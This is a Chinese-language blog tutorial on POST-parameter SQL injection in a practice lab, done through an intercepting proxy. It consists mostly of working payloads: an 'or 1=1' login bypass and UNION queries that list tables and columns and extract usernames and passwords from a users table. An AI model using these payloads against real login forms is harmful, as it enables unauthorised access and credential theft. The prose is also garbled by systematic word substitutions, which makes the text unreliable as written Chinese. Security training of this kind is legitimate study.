共计 905 个字符,预计需要花费 3 分钟才能阅读完成。
本文仅提供思路学习参考
POST 注入
在咱们一般的上网生存中,登录页是咱们常常打交道的一个网页,而其原理个别都是通过 POST 办法将咱们的账号密码整体作为一个表单发送给后端数据库经校验后,用户登录。它其实只是数据提交型式的不同,应用的办法都是基于后面的 Union,报错,工夫等等注入形式。是一个不错的温习机会。个别配合着抓包工具应用,这里举荐burpsuite。
靶场实战
任意输出 username password 点击 submit 提交表单信息。
(接下来都是在抓包工具中对参数进行批改)
在 username 处须要结构恒真语句 uname=a or 1=1--+&passwd=1&submit=Submit 返回页面出错,阐明不是数字型uname=a'or 1=1--+&passwd=1&submit=Submit 返回页面,登录胜利uname=a' or 1=2--+&passwd=1&submit=Submit 返回页面出错,登录失败
存在回显的话,那就能够用 union 查问来获取咱们须要的信息了。
1. 先查看数据库版本和数据库名uname=a' union select database(),version()--+
2. 查看表名
uname=a' union select1,group_concat(table_name) from information_schema.tables where table_schema =database()--+
3. 获取列名
uname=a'union select 1,group_concat(column_name) from information_schema.columns where table_name ='users'--+
4. 获取具体信息
uname=a' union select 1,group_concat(username,password) from users--+
至此,咱们想要获取的信息都获取到了,POST 注入次要是配合抓包工具来进行更改参数,实质还是用着前几种办法!持续加油
参考链接
https://blog.csdn.net/qq_4126…
https://portswigger.net/burp